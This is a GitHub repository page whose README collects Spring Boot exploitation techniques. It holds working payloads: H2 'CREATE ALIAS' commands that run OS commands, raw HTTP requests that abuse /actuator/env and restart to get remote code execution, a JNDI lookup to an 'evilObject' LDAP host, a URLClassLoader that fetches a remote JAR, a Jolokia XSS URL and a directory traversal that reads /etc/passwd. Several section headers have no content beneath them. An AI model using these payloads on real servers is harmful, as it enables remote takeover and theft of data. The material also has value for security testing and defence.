https://github.com/pyn3rd/Spring-Boot-Vulnerability
https://github.com/pyn3rd/Spring-Boot-Vulnerability
Last synced: 4 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/pyn3rd/Spring-Boot-Vulnerability
- Owner: pyn3rd
- Created: 2020-08-06T03:29:18.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2022-01-05T03:18:27.000Z (almost 4 years ago)
- Last Synced: 2024-11-21T12:44:55.326Z (12 months ago)
- Size: 6.15 MB
- Stars: 398
- Watchers: 16
- Forks: 56
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - pyn3rd/Spring-Boot-Vulnerability - (Others)
README
# Spring Boot Vulnerability (Keep On Updating)
### 0x01 Spring Boot Actuator Exposed
Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example the health endpoint provides basic application health information. The following endpoints are available:
* ##### /autoconfig - Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied.
* ##### /beans - Displays a complete list of all the Spring beans in your application.
* ##### /configprops - Displays a collated list of all @ConfigurationProperties.
* ##### /dump - Performs a thread dump.
* ##### /heapdump - JVM heap dump information. Actually it is a binary file, you can utilize the tool named ``MemoryAnalyzer`` to analyze the file. Sometimes in this file maybe you can find ``PASSWORD / ACCESS_KEY / COOKIES / ACCESS_TOKEN`` or some sensitive information.
* ##### /env - Exposes properties from Spring's ConfigurableEnvironment.
* ##### /health - Shows application health information (a simple 'status' when accessed over an unauthenticated connection or full message details when authenticated).
* ##### /info - Displays arbitrary application info.
* ##### /metrics - Shows 'metrics' information for the current application.
* ##### /mappings - Displays a collated list of all @RequestMapping paths.
* ##### /shutdown - Allows the application to be gracefully shutdown (not enabled by default).
* ##### /pause - Allows the application to be gracefully pause (not enabled by default).
* ##### /resume - Allows the application to be gracefully resume (not enabled by default).
* ##### /trace - Displays trace information (by default the last few HTTP requests).
### 0x02 Spring Boot RCE/XSS involving Jolokia
#### 0x001 Jolokia RCE
#### 0x002 Jolokia XSS fixed since Jolokia ``1.5.0`` (CVE-2018-1000129)
pom.xml
```
org.jolokia
jolokia-core
1.4.0
```
When visiting URL ``http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html``
### 0x03 Spring Boot RCE involving H2 Database JNDI Injection
pom.xml
```
org.springframework.boot
spring-boot-starter-data-jpa
2.2.6.RELEASE
com.h2database
h2
runtime
1.4.2
```
application.properties
```
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
```
You can visit ``/actutor/env`` to make sure ``H2 Console`` is enabled.
##### Example 1: Execute ``open -a Calculator`` Command
### 0x04 Spring Boot RCE involving H2 Database ``ALIAS`` Command
##### Example 1: Execute ``id`` Command
```
CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL EXECMD('id')
```
##### Example 2: Execute ``open -a Calculator`` Command
```
CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;
CALL EXECMD('open -a Calculator');
```
### 0x05 Spring Boot RCE involving JMX enabled
When visiting URL ``http://127.0.0.1:10090/actuator/env/spring.jmx.enabled``, you will find JMX is enabled.
##### Example 1: Execute ``open -a Calculator`` Command
### 0x06 Spring Boot RCE involving H2 Database
#### 0x001 Remote Code Execution via ``spring.datasource.hikari.connection-test-query``or``spring.datasource.hikari.connection-init-sql``
##### Example 1: ``spring.datasource.hikari.connection-init-sql``
Step 1:
```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 280
{"sourceType": "com.zaxxer.hikari.HikariDataSource","name":"spring.datasource.hikari.connection-init-sql","value":"CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;CALL EXECMD('open -a Calculator');"}
```
Step 2:
```
POST /actuator/restart HTTP/1.1
```
#### 0x002 JNDI Injection
Step 1:
```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320
{
"name": "spring.datasource.hikari.connection-init-sql",
"value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception {new InitialContext().lookup(url);return null;}$$;CALL jndi('ldap://127.0.0.1:1389/evilObject');"
}
```
Step 2:
```
POST /actuator/restart HTTP/1.1
```
#### 0x003 URL Classloader
Step 1:
```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320
{
"name": "spring.datasource.hikari.connection-init-sql",
"value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName (\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$;CALL remoteUrl()"
}
```
Step 2:
```
POST /actuator/restart HTTP/1.1
```
### 0x07 Spring Boot RCE involving MyBatis (CVE-2020-26945)
### 0x08 Spring Boot Actuator Logview Directory Traversal (CVE-2021-21234)
#### Set Break Piont At ``securityCheck()``
#### Construct Directory Traversal Request URL
`` http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../ ``
#### Step Into
#### Step Into
``spring.log/../../../../../`` as folder, and ``/etc/passwd`` is the file we want
#### Step Into
In toFile() , the folder ``spring.log/../../../../../`` and the file ``/etc/passwd`` will be concated as path without ``securityCheck()``
#### Retreive the content of file `` /etc/passwd ``
### 0x09 Spring Boot Log4j2 JNDI Injection